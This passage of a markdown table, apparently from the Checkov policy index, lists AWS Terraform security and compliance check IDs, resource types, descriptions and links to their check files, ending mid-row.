from a specific known organization | Terraform | [GithubActionsOIDCTrustPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py) | -| 505 | CKV_AWS_359 | resource | aws_neptune_cluster | Neptune DB clusters should have IAM database authentication enabled | Terraform | [NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py) | -| 506 | CKV_AWS_360 | resource | aws_docdb_cluster | Ensure DocumentDB has an adequate backup retention period | Terraform | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBBackupRetention.py) | -| 507 | CKV_AWS_361 | resource | aws_neptune_cluster | Ensure that Neptune DB cluster has automated backups enabled with adequate retention | Terraform | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterBackupRetention.py) | -| 508 | CKV_AWS_362 | resource | aws_neptune_cluster | Neptune DB clusters should be configured to copy tags to snapshots | Terraform | [NeptuneDBClustersCopyTagsToSnapshots.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersCopyTagsToSnapshots.py) | -| 509 | CKV_AWS_363 | resource | aws_lambda_function | Ensure Lambda Runtime is not deprecated | Terraform | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py) | -| 510 | CKV_AWS_364 | resource | aws_lambda_permission | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount | Terraform | 
[LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaServicePermission.py) | -| 511 | CKV_AWS_365 | resource | aws_ses_configuration_set | Ensure SES Configuration Set enforces TLS usage | Terraform | [SesConfigurationSetDefinesTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SesConfigurationSetDefinesTLS.py) | -| 512 | CKV2_AWS_1 | resource | aws_network_acl | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | -| 513 | CKV2_AWS_1 | resource | aws_subnet | Ensure that all NACL are attached to subnets | Terraform | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml) | -| 514 | CKV2_AWS_2 | resource | aws_ebs_volume | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | -| 515 | CKV2_AWS_2 | resource | aws_volume_attachment | Ensure that only encrypted EBS volumes are attached to EC2 instances | Terraform | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml) | -| 516 | CKV2_AWS_3 | resource | aws_guardduty_detector | Ensure GuardDuty is enabled to specific org/region | Terraform | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | -| 517 | CKV2_AWS_3 | resource | aws_guardduty_organization_configuration | Ensure GuardDuty is enabled to specific org/region | Terraform | 
[GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml) | -| 518 | CKV2_AWS_4 | resource | aws_api_gateway_method_settings | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | -| 519 | CKV2_AWS_4 | resource | aws_api_gateway_stage | Ensure API Gateway stage have logging level defined as appropriate | Terraform | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml) | -| 520 | CKV2_AWS_5 | resource | aws_security_group | Ensure that Security Groups are attached to another resource | Terraform | [SGAttachedToResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml) | -| 521 | CKV2_AWS_6 | resource | aws_s3_bucket | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | -| 522 | CKV2_AWS_6 | resource | aws_s3_bucket_public_access_block | Ensure that S3 bucket has a Public Access block | Terraform | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml) | -| 523 | CKV2_AWS_7 | resource | aws_emr_cluster | Ensure that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | -| 524 | CKV2_AWS_7 | resource | aws_security_group | Ensure 
that Amazon EMR clusters' security groups are not open to the world | Terraform | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml) | -| 525 | CKV2_AWS_8 | resource | aws_rds_cluster | Ensure that RDS clusters has backup plan of AWS Backup | Terraform | [RDSClusterHasBackupPlan.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml) | -| 526 | CKV2_AWS_9 | resource | aws_backup_selection | Ensure that EBS are added in the backup plans of AWS Backup | Terraform | [EBSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml) | -| 527 | CKV2_AWS_10 | resource | aws_cloudtrail | Ensure CloudTrail trails are integrated with CloudWatch Logs | Terraform | [CloudtrailHasCloudwatch.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml) | -| 528 | CKV2_AWS_11 | resource | aws_vpc | Ensure VPC flow logging is enabled in all VPCs | Terraform | [VPCHasFlowLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml) | -| 529 | CKV2_AWS_12 | resource | aws_default_security_group | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | -| 530 | CKV2_AWS_12 | resource | aws_vpc | Ensure the default security group of every VPC restricts all traffic | Terraform | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml) | -| 531 | CKV2_AWS_14 | resource | aws_iam_group | Ensure that IAM groups includes at least one IAM user | Terraform | 
[IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | -| 532 | CKV2_AWS_14 | resource | aws_iam_group_membership | Ensure that IAM groups includes at least one IAM user | Terraform | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml) | -| 533 | CKV2_AWS_15 | resource | aws_autoscaling_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 534 | CKV2_AWS_15 | resource | aws_elb | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. | Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 535 | CKV2_AWS_15 | resource | aws_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks. 
| Terraform | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml) | -| 536 | CKV2_AWS_16 | resource | aws_appautoscaling_target | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | -| 537 | CKV2_AWS_16 | resource | aws_dynamodb_table | Ensure that Auto Scaling is enabled on your DynamoDB tables | Terraform | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml) | -| 538 | CKV2_AWS_18 | resource | aws_backup_selection | Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup | Terraform | [EFSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml) | -| 539 | CKV2_AWS_19 | resource | aws_eip | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | -| 540 | CKV2_AWS_19 | resource | aws_eip_association | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances | Terraform | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml) | -| 541 | CKV2_AWS_20 | resource | aws_alb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 542 | CKV2_AWS_20 | 
resource | aws_alb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 543 | CKV2_AWS_20 | resource | aws_lb | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 544 | CKV2_AWS_20 | resource | aws_lb_listener | Ensure that ALB redirects HTTP requests into HTTPS ones | Terraform | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml) | -| 545 | CKV2_AWS_21 | resource | aws_iam_group_membership | Ensure that all IAM users are members of at least one IAM group. | Terraform | [IAMUsersAreMembersAtLeastOneGroup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml) | -| 546 | CKV2_AWS_22 | resource | aws_iam_user | Ensure an IAM User does not have access to the console | Terraform | [IAMUserHasNoConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml) | -| 547 | CKV2_AWS_23 | resource | aws_route53_record | Route53 A Record has Attached Resource | Terraform | [Route53ARecordAttachedResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml) | -| 548 | CKV2_AWS_27 | resource | aws_rds_cluster | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | -| 549 | CKV2_AWS_27 | 
resource | aws_rds_cluster_parameter_group | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled | Terraform | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml) | -| 550 | CKV2_AWS_28 | resource | aws_alb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | -| 551 | CKV2_AWS_28 | resource | aws_lb | Ensure public facing ALB are protected by WAF | Terraform | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml) | -| 552 | CKV2_AWS_29 | resource | aws_api_gateway_rest_api | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | -| 553 | CKV2_AWS_29 | resource | aws_api_gateway_stage | Ensure public API gateway are protected by WAF | Terraform | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml) | -| 554 | CKV2_AWS_30 | resource | aws_db_instance | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | -| 555 | CKV2_AWS_30 | resource | aws_db_parameter_group | Ensure Postgres RDS as aws_db_instance has Query Logging enabled | Terraform | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml) | -| 556 | CKV2_AWS_31 | resource | aws_wafv2_web_acl | Ensure WAF2 
has a Logging Configuration | Terraform | [WAF2HasLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml) | -| 557 | CKV2_AWS_32 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a response headers policy attached | Terraform | [CloudFrontHasResponseHeadersPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasResponseHeadersPolicy.yaml) | -| 558 | CKV2_AWS_33 | resource | aws_appsync_graphql_api | Ensure AppSync is protected by WAF | Terraform | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml) | -| 559 | CKV2_AWS_34 | resource | aws_ssm_parameter | AWS SSM Parameter should be Encrypted | Terraform | [AWSSSMParameterShouldBeEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml) | -| 560 | CKV2_AWS_35 | resource | aws_route | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | -| 561 | CKV2_AWS_35 | resource | aws_route_table | AWS NAT Gateways should be utilized for the default route | Terraform | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml) | -| 562 | CKV2_AWS_36 | resource | aws_ssm_parameter | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | -| 563 | CKV2_AWS_36 | resource | data.http | Ensure terraform is not sending SSM 
secrets to untrusted domains over HTTP | Terraform | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml) | -| 564 | CKV2_AWS_37 | resource | aws | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 565 | CKV2_AWS_37 | resource | aws_accessanalyzer_analyzer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 566 | CKV2_AWS_37 | resource | aws_acm_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 567 | CKV2_AWS_37 | resource | aws_acm_certificate_validation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 568 | CKV2_AWS_37 | resource | aws_acmpca_certificate_authority | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 569 | CKV2_AWS_37 | resource | aws_ami | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 570 | CKV2_AWS_37 | resource | aws_ami_copy | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 571 | CKV2_AWS_37 | resource | aws_ami_from_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 572 | CKV2_AWS_37 | resource | aws_ami_launch_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 573 | CKV2_AWS_37 | resource | aws_api_gateway_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 574 | CKV2_AWS_37 | resource | aws_api_gateway_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 575 | CKV2_AWS_37 | resource | aws_api_gateway_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 576 | CKV2_AWS_37 | resource | aws_api_gateway_base_path_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 577 | 
CKV2_AWS_37 | resource | aws_api_gateway_client_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 578 | CKV2_AWS_37 | resource | aws_api_gateway_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 579 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_part | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 580 | CKV2_AWS_37 | resource | aws_api_gateway_documentation_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 581 | CKV2_AWS_37 | resource | aws_api_gateway_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 582 | CKV2_AWS_37 | resource | aws_api_gateway_gateway_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 583 | CKV2_AWS_37 | resource | aws_api_gateway_integration | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 584 | CKV2_AWS_37 | resource | aws_api_gateway_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 585 | CKV2_AWS_37 | resource | aws_api_gateway_method | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 586 | CKV2_AWS_37 | resource | aws_api_gateway_method_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 587 | CKV2_AWS_37 | resource | aws_api_gateway_method_settings | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 588 | CKV2_AWS_37 | resource | aws_api_gateway_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 589 | CKV2_AWS_37 | resource | aws_api_gateway_request_validator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 590 | CKV2_AWS_37 | resource | 
aws_api_gateway_resource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 591 | CKV2_AWS_37 | resource | aws_api_gateway_rest_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 592 | CKV2_AWS_37 | resource | aws_api_gateway_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 593 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 594 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 595 | CKV2_AWS_37 | resource | aws_api_gateway_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 596 | CKV2_AWS_37 | resource | aws_apigatewayv2_api | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 597 | CKV2_AWS_37 | resource | aws_apigatewayv2_api_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 598 | CKV2_AWS_37 | resource | aws_apigatewayv2_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 599 | CKV2_AWS_37 | resource | aws_apigatewayv2_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 600 | CKV2_AWS_37 | resource | aws_apigatewayv2_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 601 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 602 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 603 | CKV2_AWS_37 | resource | 
aws_apigatewayv2_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 604 | CKV2_AWS_37 | resource | aws_apigatewayv2_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 605 | CKV2_AWS_37 | resource | aws_apigatewayv2_route_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 606 | CKV2_AWS_37 | resource | aws_apigatewayv2_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 607 | CKV2_AWS_37 | resource | aws_apigatewayv2_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 608 | CKV2_AWS_37 | resource | aws_app_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | 